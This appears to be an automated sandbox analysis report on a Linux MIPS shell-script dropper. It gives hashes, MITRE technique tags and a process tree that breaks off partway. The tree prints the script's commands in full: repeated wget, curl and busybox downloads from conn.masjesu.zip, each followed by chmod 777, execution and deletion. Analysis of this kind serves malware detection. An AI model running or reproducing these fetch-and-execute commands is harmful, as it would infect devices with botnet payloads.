f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846

Analysis

max time kernel
71s
max time network
72s
platform
debian-9_mipsel
resource
debian9-mipsel-20240729-en
resource tags

arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
21-11-2024 08:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh
Size

10KB
MD5

870412aa111e349e42e1f548ec8a403b
SHA1

153e8fcedb429489b3693cc5cedeea4941f50863
SHA256

f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846
SHA512

80c0d64609a745be89da8498981397db3523be1ecd3ec0a572884e7c6f78b3daddf65d840bf0330d1de60961c4cf648168ff448090fc66701736735404041ef0
SSDEEP

192:7c8YN2uxllcj/ZuuUrdzr8YN2uZllcj/l0VW:7c8YN2u2uuUrtr8YN2ug0k

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
868	chmod
983	chmod
796	chmod
817	chmod
990	chmod
1018	chmod
955	chmod
948	chmod
976	chmod
1011	chmod
875	chmod
885	chmod
941	chmod
1004	chmod
861	chmod
920	chmod
997	chmod
751	chmod
899	chmod
913	chmod
934	chmod
969	chmod
962	chmod
758	chmod
840	chmod
892	chmod
906	chmod
927	chmod

Executes dropped EXE 28 IoCs

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 64 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
989	busybox
802	wget
916	wget
951	wget
952	curl
961	busybox
812	curl
931	curl
937	wget
973	curl
741	curl
754	wget
968	busybox
980	curl
1007	wget
725	wget
909	wget
919	busybox
965	wget
993	wget
1003	busybox
1017	busybox
757	busybox
821	curl
871	wget
954	busybox
987	curl
996	busybox
1008	curl
1014	wget
823	busybox
865	curl
895	wget
940	busybox
947	busybox
975	busybox
1010	busybox
820	wget
846	wget
867	busybox
902	wget
959	curl
764	wget
872	curl
903	curl
910	curl
930	wget
994	curl
748	busybox
778	curl
788	busybox
884	busybox
898	busybox
979	wget
864	wget
889	curl
923	wget
958	wget
972	wget
1000	wget
1015	curl
874	busybox
882	curl
896	curl

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa	curl
File opened for modification	/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx	curl
File opened for modification	/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I	curl
File opened for modification	/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo	curl
File opened for modification	/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL	curl
File opened for modification	/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa	curl
File opened for modification	/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a	curl
File opened for modification	/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp	curl
File opened for modification	/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR	curl
File opened for modification	/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL	curl
File opened for modification	/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY	curl
File opened for modification	/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA	curl
File opened for modification	/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY	curl
File opened for modification	/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA	curl
File opened for modification	/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp	curl
File opened for modification	/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa	curl
File opened for modification	/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa	curl
File opened for modification	/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx	curl
File opened for modification	/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD	curl
File opened for modification	/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p	curl
File opened for modification	/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo	curl
File opened for modification	/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a	curl
File opened for modification	/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD	curl
File opened for modification	/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY	curl
File opened for modification	/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR	curl
File opened for modification	/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p	curl
File opened for modification	/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY	curl
File opened for modification	/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I	curl

/tmp/f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh
/tmp/f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh
1⤵
PID:719
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:723
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
  2⤵
  - System Network Configuration Discovery
  PID:725
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:741
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
  2⤵
  - System Network Configuration Discovery
  PID:748
- /bin/chmod
  chmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
  2⤵
  - File and Directory Permissions Modification
  PID:751
- /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
  ./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
  2⤵
  - Executes dropped EXE
  PID:752
- /bin/rm
  rm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
  2⤵
  PID:753
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
  2⤵
  - System Network Configuration Discovery
  PID:754
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:755
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
  2⤵
  - System Network Configuration Discovery
  PID:757
- /bin/chmod
  chmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
  2⤵
  - File and Directory Permissions Modification
  PID:758
- /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
  ./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
  2⤵
  - Executes dropped EXE
  PID:759
- /bin/rm
  rm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
  2⤵
  PID:762
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
  2⤵
  - System Network Configuration Discovery
  PID:764
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:778
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
  2⤵
  - System Network Configuration Discovery
  PID:788
- /bin/chmod
  chmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
  2⤵
  - File and Directory Permissions Modification
  PID:796
- /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
  ./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
  2⤵
  - Executes dropped EXE
  PID:797
- /bin/rm
  rm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
  2⤵
  PID:801
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
  2⤵
  - System Network Configuration Discovery
  PID:802
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:812
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
  2⤵
  PID:816
- /bin/chmod
  chmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
  2⤵
  - File and Directory Permissions Modification
  PID:817
- /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
  ./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
  2⤵
  - Executes dropped EXE
  PID:818
- /bin/rm
  rm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
  2⤵
  PID:819
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
  2⤵
  - System Network Configuration Discovery
  PID:820
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:821
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
  2⤵
  - System Network Configuration Discovery
  PID:823
- /bin/chmod
  chmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
  2⤵
  - File and Directory Permissions Modification
  PID:840
- /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
  ./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
  2⤵
  - Executes dropped EXE
  PID:841
- /bin/rm
  rm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
  2⤵
  PID:844
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
  2⤵
  - System Network Configuration Discovery
  PID:846
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:854
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
  2⤵
  PID:860
- /bin/chmod
  chmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
  2⤵
  - File and Directory Permissions Modification
  PID:861
- /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
  ./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
  2⤵
  - Executes dropped EXE
  PID:862
- /bin/rm
  rm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
  2⤵
  PID:863
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
  2⤵
  - System Network Configuration Discovery
  PID:864
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:865
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
  2⤵
  - System Network Configuration Discovery
  PID:867
- /bin/chmod
  chmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
  2⤵
  - File and Directory Permissions Modification
  PID:868
- /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
  ./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
  2⤵
  - Executes dropped EXE
  PID:869
- /bin/rm
  rm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
  2⤵
  PID:870
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
  2⤵
  - System Network Configuration Discovery
  PID:871
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:872
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
  2⤵
  - System Network Configuration Discovery
  PID:874
- /bin/chmod
  chmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
  2⤵
  - File and Directory Permissions Modification
  PID:875
- /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
  ./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
  2⤵
  - Executes dropped EXE
  PID:876
- /bin/rm
  rm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
  2⤵
  PID:877
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
  2⤵
  PID:878
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:882
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
  2⤵
  - System Network Configuration Discovery
  PID:884
- /bin/chmod
  chmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
  2⤵
  - File and Directory Permissions Modification
  PID:885
- /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
  ./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
  2⤵
  - Executes dropped EXE
  PID:886
- /bin/rm
  rm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
  2⤵
  PID:887
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
  2⤵
  PID:888
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:889
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
  2⤵
  PID:891
- /bin/chmod
  chmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
  2⤵
  - File and Directory Permissions Modification
  PID:892
- /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
  ./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
  2⤵
  - Executes dropped EXE
  PID:893
- /bin/rm
  rm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
  2⤵
  PID:894
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
  2⤵
  - System Network Configuration Discovery
  PID:895
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:896
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
  2⤵
  - System Network Configuration Discovery
  PID:898
- /bin/chmod
  chmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
  2⤵
  - File and Directory Permissions Modification
  PID:899
- /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
  ./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
  2⤵
  - Executes dropped EXE
  PID:900
- /bin/rm
  rm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
  2⤵
  PID:901
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
  2⤵
  - System Network Configuration Discovery
  PID:902
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:903
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
  2⤵
  PID:905
- /bin/chmod
  chmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
  2⤵
  - File and Directory Permissions Modification
  PID:906
- /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
  ./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
  2⤵
  - Executes dropped EXE
  PID:907
- /bin/rm
  rm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
  2⤵
  PID:908
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
  2⤵
  - System Network Configuration Discovery
  PID:909
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:910
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
  2⤵
  PID:912
- /bin/chmod
  chmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
  2⤵
  - File and Directory Permissions Modification
  PID:913
- /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
  ./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
  2⤵
  - Executes dropped EXE
  PID:914
- /bin/rm
  rm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
  2⤵
  PID:915
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
  2⤵
  - System Network Configuration Discovery
  PID:916
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:917
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
  2⤵
  - System Network Configuration Discovery
  PID:919
- /bin/chmod
  chmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
  2⤵
  - File and Directory Permissions Modification
  PID:920
- /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
  ./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
  2⤵
  - Executes dropped EXE
  PID:921
- /bin/rm
  rm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
  2⤵
  PID:922
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
  2⤵
  - System Network Configuration Discovery
  PID:923
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:924
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
  2⤵
  PID:926
- /bin/chmod
  chmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
  2⤵
  - File and Directory Permissions Modification
  PID:927
- /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
  ./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
  2⤵
  - Executes dropped EXE
  PID:928
- /bin/rm
  rm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
  2⤵
  PID:929
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
  2⤵
  - System Network Configuration Discovery
  PID:930
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:931
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
  2⤵
  PID:933
- /bin/chmod
  chmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
  2⤵
  - File and Directory Permissions Modification
  PID:934
- /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
  ./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
  2⤵
  - Executes dropped EXE
  PID:935
- /bin/rm
  rm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
  2⤵
  PID:936
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
  2⤵
  - System Network Configuration Discovery
  PID:937
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:938
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
  2⤵
  - System Network Configuration Discovery
  PID:940
- /bin/chmod
  chmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
  2⤵
  - File and Directory Permissions Modification
  PID:941
- /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
  ./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
  2⤵
  - Executes dropped EXE
  PID:942
- /bin/rm
  rm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
  2⤵
  PID:943
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
  2⤵
  PID:944
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:945
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
  2⤵
  - System Network Configuration Discovery
  PID:947
- /bin/chmod
  chmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
  2⤵
  - File and Directory Permissions Modification
  PID:948
- /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
  ./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
  2⤵
  - Executes dropped EXE
  PID:949
- /bin/rm
  rm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
  2⤵
  PID:950
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
  2⤵
  - System Network Configuration Discovery
  PID:951
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:952
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
  2⤵
  - System Network Configuration Discovery
  PID:954
- /bin/chmod
  chmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
  2⤵
  - File and Directory Permissions Modification
  PID:955
- /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
  ./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
  2⤵
  - Executes dropped EXE
  PID:956
- /bin/rm
  rm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
  2⤵
  PID:957
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
  2⤵
  - System Network Configuration Discovery
  PID:958
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:959
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
  2⤵
  - System Network Configuration Discovery
  PID:961
- /bin/chmod
  chmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
  2⤵
  - File and Directory Permissions Modification
  PID:962
- /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
  ./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
  2⤵
  - Executes dropped EXE
  PID:963
- /bin/rm
  rm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
  2⤵
  PID:964
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
  2⤵
  - System Network Configuration Discovery
  PID:965
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:966
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
  2⤵
  - System Network Configuration Discovery
  PID:968
- /bin/chmod
  chmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
  2⤵
  - File and Directory Permissions Modification
  PID:969
- /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
  ./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
  2⤵
  - Executes dropped EXE
  PID:970
- /bin/rm
  rm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
  2⤵
  PID:971
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
  2⤵
  - System Network Configuration Discovery
  PID:972
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:973
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
  2⤵
  - System Network Configuration Discovery
  PID:975
- /bin/chmod
  chmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
  2⤵
  - File and Directory Permissions Modification
  PID:976
- /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
  ./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
  2⤵
  - Executes dropped EXE
  PID:977
- /bin/rm
